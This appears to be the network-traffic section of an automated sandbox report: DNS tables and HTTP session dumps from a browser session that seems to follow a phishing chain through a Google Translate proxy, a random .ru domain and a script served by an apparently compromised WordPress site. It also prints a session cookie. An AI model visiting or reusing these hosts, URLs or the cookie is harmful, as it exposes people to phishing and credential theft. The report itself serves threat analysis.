                                                                                                                                                                                    Jan 26, 2024 14:41:28.975714922 CET192.168.2.161.1.1.10xda63Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:28.976155043 CET192.168.2.161.1.1.10x326bStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:28.976528883 CET192.168.2.161.1.1.10x30efStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:30.309941053 CET192.168.2.161.1.1.10x8e2aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:30.310445070 CET192.168.2.161.1.1.10x16caStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:31.826164007 CET192.168.2.161.1.1.10x1a3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:31.826356888 CET192.168.2.161.1.1.10xdd44Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:39.342803001 CET192.168.2.161.1.1.10x498cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:39.344086885 CET192.168.2.161.1.1.10x46b0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.374093056 CET192.168.2.161.1.1.10x3a5eStandard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.374766111 CET192.168.2.161.1.1.10x9d81Standard query (0)aadcdn.msauthimages.net65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.422066927 CET192.168.2.161.1.1.10x24cfStandard query (0)bggcwvekn3axi3ffz5ai.rvucouijw.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.422458887 CET192.168.2.161.1.1.10x44fStandard query (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:55.551898003 CET192.168.2.161.1.1.10xfcf8Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:55.554053068 CET192.168.2.161.1.1.10xb62eStandard query (0)aadcdn.msauthimages.net65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.363157034 CET192.168.2.161.1.1.10x8a8cStandard query (0)clients1.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.363822937 CET192.168.2.161.1.1.10xf54Standard query (0)clients1.google.com65IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET1.1.1.1192.168.2.160xea7fNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET1.1.1.1192.168.2.160xea7fNo error (0)clients.l.google.com64.233.177.138A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET1.1.1.1192.168.2.160xea7fNo error (0)clients.l.google.com64.233.177.139A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET1.1.1.1192.168.2.160xea7fNo error (0)clients.l.google.com64.233.177.102A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET1.1.1.1192.168.2.160xea7fNo error (0)clients.l.google.com64.233.177.113A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET1.1.1.1192.168.2.160xea7fNo error (0)clients.l.google.com64.233.177.100A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET1.1.1.1192.168.2.160xea7fNo error (0)clients.l.google.com64.233.177.101A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283941031 CET1.1.1.1192.168.2.160x34a7No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.284419060 CET1.1.1.1192.168.2.160x1da3No error (0)accounts.google.com74.125.138.84A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:24.134855032 CET1.1.1.1192.168.2.160x7188No error (0)kibt.edu.lk192.185.5.187A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:24.956381083 CET1.1.1.1192.168.2.160x6No error (0)cascade-madmimi-com.translate.goog172.217.215.132A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:25.885040998 CET1.1.1.1192.168.2.160xece7No error (0)cascade-madmimi-com.translate.goog142.250.9.132A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510015965 CET1.1.1.1192.168.2.160xb731No error (0)www.google.com142.250.105.105A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510015965 CET1.1.1.1192.168.2.160xb731No error (0)www.google.com142.250.105.103A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510015965 CET1.1.1.1192.168.2.160xb731No error (0)www.google.com142.250.105.147A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510015965 CET1.1.1.1192.168.2.160xb731No error (0)www.google.com142.250.105.99A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510015965 CET1.1.1.1192.168.2.160xb731No error (0)www.google.com142.250.105.106A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510015965 CET1.1.1.1192.168.2.160xb731No error (0)www.google.com142.250.105.104A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510759115 CET1.1.1.1192.168.2.160x402fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.720777035 CET1.1.1.1192.168.2.160xb293No error (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru104.21.79.9A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.720777035 CET1.1.1.1192.168.2.160xb293No error (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru172.67.139.144A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.757230997 CET1.1.1.1192.168.2.160x5484No error (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:28.961772919 CET1.1.1.1192.168.2.160x7807No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094404936 CET1.1.1.1192.168.2.160xda63No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094424963 CET1.1.1.1192.168.2.160x306aNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094424963 CET1.1.1.1192.168.2.160x306aNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094844103 CET1.1.1.1192.168.2.160x326bNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094844103 CET1.1.1.1192.168.2.160x326bNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094844103 CET1.1.1.1192.168.2.160x326bNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094844103 CET1.1.1.1192.168.2.160x326bNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094844103 CET1.1.1.1192.168.2.160x326bNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:29.095380068 CET1.1.1.1192.168.2.160x30efNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:30.428713083 CET1.1.1.1192.168.2.160x8e2aNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:30.428713083 CET1.1.1.1192.168.2.160x8e2aNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:30.429198027 CET1.1.1.1192.168.2.160x16caNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:31.944544077 CET1.1.1.1192.168.2.160x1a3No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:31.944544077 CET1.1.1.1192.168.2.160x1a3No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:31.945250988 CET1.1.1.1192.168.2.160xdd44No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:39.461385012 CET1.1.1.1192.168.2.160x498cNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:39.461385012 CET1.1.1.1192.168.2.160x498cNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:39.463254929 CET1.1.1.1192.168.2.160x46b0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.493304014 CET1.1.1.1192.168.2.160x3a5eNo error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.493304014 CET1.1.1.1192.168.2.160x3a5eNo error (0)scdn3514c.wpc.9e730.upsiloncdn.netsni1gl.wpc.upsiloncdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.493304014 CET1.1.1.1192.168.2.160x3a5eNo error (0)sni1gl.wpc.upsiloncdn.net152.195.19.97A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.494159937 CET1.1.1.1192.168.2.160x9d81No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.494159937 CET1.1.1.1192.168.2.160x9d81No error (0)scdn3514c.wpc.9e730.upsiloncdn.netsni1gl.wpc.upsiloncdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.542210102 CET1.1.1.1192.168.2.160x44fNo error (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.544529915 CET1.1.1.1192.168.2.160x24cfNo error (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru172.67.139.144A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:54.544529915 CET1.1.1.1192.168.2.160x24cfNo error (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru104.21.79.9A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:55.671276093 CET1.1.1.1192.168.2.160xfcf8No error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:55.671276093 CET1.1.1.1192.168.2.160xfcf8No error (0)scdn3514c.wpc.9e730.upsiloncdn.netsni1gl.wpc.upsiloncdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:55.671276093 CET1.1.1.1192.168.2.160xfcf8No error (0)sni1gl.wpc.upsiloncdn.net152.195.19.97A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:55.673573017 CET1.1.1.1192.168.2.160xb62eNo error (0)aadcdn.msauthimages.netaadcdn.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:55.673573017 CET1.1.1.1192.168.2.160xb62eNo error (0)scdn3514c.wpc.9e730.upsiloncdn.netsni1gl.wpc.upsiloncdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET1.1.1.1192.168.2.160x8a8cNo error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET1.1.1.1192.168.2.160x8a8cNo error (0)clients.l.google.com142.251.15.138A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET1.1.1.1192.168.2.160x8a8cNo error (0)clients.l.google.com142.251.15.101A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET1.1.1.1192.168.2.160x8a8cNo error (0)clients.l.google.com142.251.15.102A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET1.1.1.1192.168.2.160x8a8cNo error (0)clients.l.google.com142.251.15.139A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET1.1.1.1192.168.2.160x8a8cNo error (0)clients.l.google.com142.251.15.113A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET1.1.1.1192.168.2.160x8a8cNo error (0)clients.l.google.com142.251.15.100A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482806921 CET1.1.1.1192.168.2.160xf54No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    • fs.microsoft.com
                                                                                                                                                                                    • clients2.google.com
                                                                                                                                                                                    • accounts.google.com
                                                                                                                                                                                    • kibt.edu.lk
                                                                                                                                                                                    • cascade-madmimi-com.translate.goog
                                                                                                                                                                                    • bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    • https:
                                                                                                                                                                                      • cdn.jsdelivr.net
                                                                                                                                                                                      • challenges.cloudflare.com
                                                                                                                                                                                      • www.bing.com
                                                                                                                                                                                      • aadcdn.msauthimages.net
                                                                                                                                                                                    • a.nel.cloudflare.com
                                                                                                                                                                                    • slscr.update.microsoft.com
                                                                                                                                                                                    • clients1.google.com
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    0192.168.2.1649717184.31.50.93443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:16 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                    2024-01-26 13:41:16 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                    X-Azure-Ref: 0URSoYgAAAABePpjyRlUAQrduejDbkqt8U0pDRURHRTA1MjAAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                                                                    Cache-Control: public, max-age=29188
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:16 GMT
                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                    2024-01-26 13:41:16 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.164972064.233.177.1384436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:23 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                                                    Host: clients2.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    X-Goog-Update-Interactivity: fg
                                                                                                                                                                                    X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                                                    X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:23 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-D3aTnUb_FdCPqIJCtyaTHA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:23 GMT
                                                                                                                                                                                    Content-Type: text/xml; charset=UTF-8
                                                                                                                                                                                    X-Daynum: 6234
                                                                                                                                                                                    X-Daystart: 20483
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Server: GSE
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    2024-01-26 13:41:23 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 33 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 30 34 38 33 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                                                    Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6234" elapsed_seconds="20483"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                                                    2024-01-26 13:41:23 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                                                    Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                                                    2024-01-26 13:41:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.164972174.125.138.844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:23 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                                                    Host: accounts.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                                    Origin: https://www.google.com
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: NID=511=LtGInZ4I4WDrCvCHQBVMHOy4a-sqzpSrMO-Rwr8ezStTz_kfoi2bri7uGdXfNvskAEO_Tj5Jkwl0XSN-qA6MYiGShcDB_vNQOl1bpl3aua7gMrDRvWsHLpAuFBlBnNxTMeen95XElzx3r4myG8p8sgSHdx4NBawYGaI5oFn_dZ8
                                                                                                                                                                                    2024-01-26 13:41:23 UTC1OUTData Raw: 20
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:23 UTC1799INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:23 GMT
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NSnXdnRzG34rvvqO-V03vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmII1pBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIR6O5rfn1rIJvDjydh8TALrSGDE"
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    2024-01-26 13:41:23 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                                                    Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                                                    2024-01-26 13:41:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.1649722192.185.5.1874436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:24 UTC687OUTGET /wp-header.php?2-53307050547934765338334f4d3036737944524f5336737954637a554b796f72546334767a637771317973714251413d-mknfazxqqVo HTTP/1.1
                                                                                                                                                                                    Host: kibt.edu.lk
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:24 UTC313INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:24 GMT
                                                                                                                                                                                    Server: nginx/1.23.4
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                                                                    Expires: Sat, 27 Jan 2024 13:41:24 GMT
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    X-Newfold-Cache-Level: 2
                                                                                                                                                                                    X-Server-Cache: true
                                                                                                                                                                                    X-Proxy-Cache: MISS
                                                                                                                                                                                    Transfer-Encoding: chunked
